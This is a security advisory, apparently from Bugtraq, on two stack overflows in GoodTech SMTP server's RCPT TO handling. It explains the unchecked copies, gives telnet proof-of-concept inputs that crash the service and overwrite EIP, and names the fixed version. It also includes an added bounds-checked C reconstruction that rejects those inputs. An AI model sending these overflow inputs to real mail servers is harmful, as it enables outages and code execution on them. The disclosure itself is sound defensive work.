Product: SMTP server by GoodTech Systems
Affected Version: 5.16 Evaluation (verified); registered builds up to 5.16 and 5.15 are probably affected too
Not affected Version: 5.17
OS affected: All WinNT (NT/2K/XP/2K3)
Risk: Critical
Remote Exploit: yes
URL: http://www.goodtechsys.com/smtpdnt2000.asp

Overview
========
The product provides Simple Mail Transfer Protocol (SMTP) service to any email
client out of the box and forwards email messages directly to their recipients.
GoodTech SMTP server runs as a service on the host Windows machine.

Vulnerabilities
===============

        1) Stack overflow in RCPT TO command handling

        Unchecked string copies allow a classic stack overflow.

        Details :
        A cascade of unchecked string copies is responsible for this
        vulnerability :
                - The maximum length of a command is 4096 bytes.
                - The requested address is copied into a 2048-byte buffer
                without a length check (no directly exploitable consequence
                on its own).
                - The domain part is extracted and copied into a 256-byte
                buffer, again without a length check (no directly exploitable
                consequence on its own either).
                - The following code is then executed : sprintf(buf,"mx.%s",domain)
                buf is only 64 bytes long, so the domain overflows it and
                overwrites the adjacent string holding the DNS server that is
                to be queried for the MX record.
                - Because that string is now non-empty, the following code is
                executed : sprintf(buf1024, "Using DNS Server %s", dnsserver)
                Since roughly 4000 bytes of domain are available, this second
                sprintf overflows buf1024 and overwrites the return address of
                the function, allowing arbitrary code execution.

        Risk : Critical
        The attacker may execute arbitrary code with the privileges of the
        SYSTEM user (by default).

        Proof of concept :

        $ telnet localhost 25
        Connected to localhost.
        Escape character is '^]'.
        220 test Simple Mail Transfer Service Ready. Version 5.15 (Evaluation)
        HELO aaa
        250 OK
        RCPT TO: <aa@|'A'x1100>
        Connection closed by foreign host.

        The service crashes with EIP == 0x41414141 ('A'x1100 above stands for
        1100 'A' characters, so the return address is overwritten with "AAAA").

        Workaround :
        No workaround is known short of stopping the service or restricting
        network access to TCP port 25.

        Solution :
        Update to v5.17, the version listed above as not affected.

        -----------------------------------------------------------------------
        2) Stack overflow in multiple RCPT TO commands handling

        Unchecked string copy allows a classic stack overflow.

        Details :
        For each RCPT TO command, the server fills a 1300-byte structure
        holding the command text and the MX server for the requested
        address.
        The server accepts up to 99 RCPT TO commands for a single mail, but
        the structure is filled by an unchecked string copy : the command,
        up to 4096 bytes long, is copied into it without any length check.
        Issuing an over-long command as the 99th RCPT TO therefore lets us
        overwrite the return address of the connection-handling thread.
        A QUIT command then makes the thread function return, so the
        overwritten address is used and our code executes.
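
        Added example (not GoodTech's code and not part of the original
        advisory): a bounds-checked reconstruction in C of the two copy chains
        described under 1) and 2), replayed against the shapes of both proofs
        of concept. The buffer sizes and the 99-recipient limit are the ones
        the advisory gives; the struct layout, the function names, the
        placeholder DNS server string and the exact parsing of RCPT TO are
        assumptions.

```c
/* Added example, not GoodTech's code: a bounds-checked reconstruction of the
 * two copy chains described in the advisory. Buffer sizes are the ones the
 * advisory gives; the struct layout, function names, the DNS server string
 * and the exact parsing of "RCPT TO:" are assumptions. */
#include <stdio.h>
#include <string.h>

#define CMD_MAX     4096   /* maximum command length (advisory) */
#define EMAIL_MAX   2048   /* address buffer (advisory) */
#define DOMAIN_MAX  256    /* domain buffer (advisory) */
#define MXNAME_MAX  64     /* "mx.%s" buffer (advisory) */
#define MSG_MAX     1024   /* "Using DNS Server %s" buffer (advisory) */
#define RCPT_MAX    99     /* recipients accepted per mail (advisory) */
#define ENTRY_SIZE  1300   /* per-recipient structure (advisory) */

enum { RCPT_OK = 0, RCPT_SYNTAX = -1, RCPT_TOO_LONG = -2, RCPT_TOO_MANY = -3 };

/* Per-recipient record: command text plus the MX host for it. The split of
 * the 1300 bytes between the two fields is an assumption. */
struct rcpt_entry { char command[ENTRY_SIZE - MXNAME_MAX]; char mx[MXNAME_MAX]; };
struct envelope   { int count; struct rcpt_entry rcpt[RCPT_MAX]; };

/* Copy n bytes of src into dst only if they fit together with the NUL.
 * This is the length check the original strcpy/sprintf calls lacked. */
static int bounded_copy(char *dst, size_t dst_sz, const char *src, size_t n)
{
    if (n >= dst_sz) return RCPT_TOO_LONG;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return RCPT_OK;
}

/* Vulnerability 1: address -> domain -> "mx.<domain>" -> log line, each step
 * into a smaller fixed buffer. Every copy is checked, and snprintf's return
 * value reports when "mx.%s" would not have fit in the 64-byte buffer. */
int handle_rcpt_to(const char *cmd, char *mxname, size_t mxname_sz)
{
    char email[EMAIL_MAX], domain[DOMAIN_MAX], msg[MSG_MAX];
    const char *dnsserver = "192.0.2.53";   /* placeholder DNS server string */
    const char *lt, *gt, *at;
    int rc;

    if (strlen(cmd) > CMD_MAX) return RCPT_TOO_LONG;
    if (strncmp(cmd, "RCPT TO:", 8) != 0) return RCPT_SYNTAX;
    lt = strchr(cmd, '<');
    gt = lt ? strchr(lt, '>') : NULL;
    if (!lt || !gt) return RCPT_SYNTAX;
    if ((rc = bounded_copy(email, sizeof email, lt + 1, (size_t)(gt - lt - 1))) != 0) return rc;
    at = strchr(email, '@');
    if (!at) return RCPT_SYNTAX;
    if ((rc = bounded_copy(domain, sizeof domain, at + 1, strlen(at + 1))) != 0) return rc;
    if (snprintf(mxname, mxname_sz, "mx.%s", domain) >= (int)mxname_sz) return RCPT_TOO_LONG;
    if (snprintf(msg, sizeof msg, "Using DNS Server %s", dnsserver) >= (int)sizeof msg) return RCPT_TOO_LONG;
    return RCPT_OK;
}

/* Vulnerability 2: append a recipient record to the envelope. Both the
 * recipient count and the copy into the 1300-byte record are checked. */
int add_recipient(struct envelope *env, const char *cmd)
{
    char mx[MXNAME_MAX];
    int rc;
    if (env->count >= RCPT_MAX) return RCPT_TOO_MANY;
    if ((rc = handle_rcpt_to(cmd, mx, sizeof mx)) != 0) return rc;
    struct rcpt_entry *e = &env->rcpt[env->count];
    if ((rc = bounded_copy(e->command, sizeof e->command, cmd, strlen(cmd))) != 0) return rc;
    memcpy(e->mx, mx, sizeof e->mx);
    env->count++;
    return RCPT_OK;
}

/* Replay the shape of the advisory's proofs of concept against the checked
 * parser: n_short harmless "RCPT TO: <aa@aa>" lines, then one command made of
 * prefix + n_a 'A' characters + suffix. Returns the first non-OK result. */
int replay_poc(int n_short, const char *prefix, size_t n_a, const char *suffix)
{
    static struct envelope env;          /* ~128 KiB, kept off the stack */
    static char cmd[CMD_MAX + 1];
    size_t plen = strlen(prefix), slen = strlen(suffix);
    int i, rc;

    memset(&env, 0, sizeof env);
    for (i = 0; i < n_short; i++)
        if ((rc = add_recipient(&env, "RCPT TO: <aa@aa>")) != 0) return rc;
    if (plen + n_a + slen > CMD_MAX) return RCPT_TOO_LONG;  /* over the 4096 limit */
    memcpy(cmd, prefix, plen);
    memset(cmd + plen, 'A', n_a);
    memcpy(cmd + plen + n_a, suffix, slen + 1);
    return add_recipient(&env, cmd);
}

int main(void)
{
    printf("PoC 1 shape (aa@ + 1100 A):            %d\n", replay_poc(0, "RCPT TO: <aa@", 1100, ">"));
    printf("PoC 2 shape (98 RCPT + 2600 A@localhost): %d\n", replay_poc(98, "RCPT TO: <", 2600, "@localhost>"));
    printf("100th recipient:                        %d\n", replay_poc(99, "RCPT TO: <", 4, "@localhost>"));
    return 0;
}
```

        Compiled with any C99 compiler, main() prints the result code for
        each proof-of-concept shape: both are refused with RCPT_TOO_LONG
        (-2) before the 64-byte or 1300-byte buffers are reached, and a 100th
        recipient is refused with RCPT_TOO_MANY (-3). Note that a 64-byte
        "mx.%s" buffer cannot hold even a legitimate 255-byte domain, so the
        checked version rejects such names rather than overflow; a real fix
        would also enlarge that buffer.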

        Risk : Critical
        The attacker may execute arbitrary code with the privileges of the
        SYSTEM user (by default).

        Proof of concept :

        $ telnet localhost 25
        Connected to localhost.
        Escape character is '^]'.
        220 test Simple Mail Transfer Service Ready. Version 5.15 (Evaluation)
        HELO aaa
        250 OK
        -- Repeat this part 98 times
        RCPT TO: <aa@aa>
        250 OK
        --
        RCPT TO: <|'A'x2600|@localhost>
        250 OK
        QUIT
        Connection closed by foreign host.

        The service crashes with EIP == 0x41414141 ('A'x2600 above stands for
        2600 'A' characters; the return address is overwritten with "AAAA").

        Workaround :
        No workaround is known short of stopping the service or restricting
        network access to TCP port 25.

        Solution :
        Update to v5.17, the version listed above as not affected.



Source: http://seclists.org/lists/bugtraq/2005/Jul/0402.html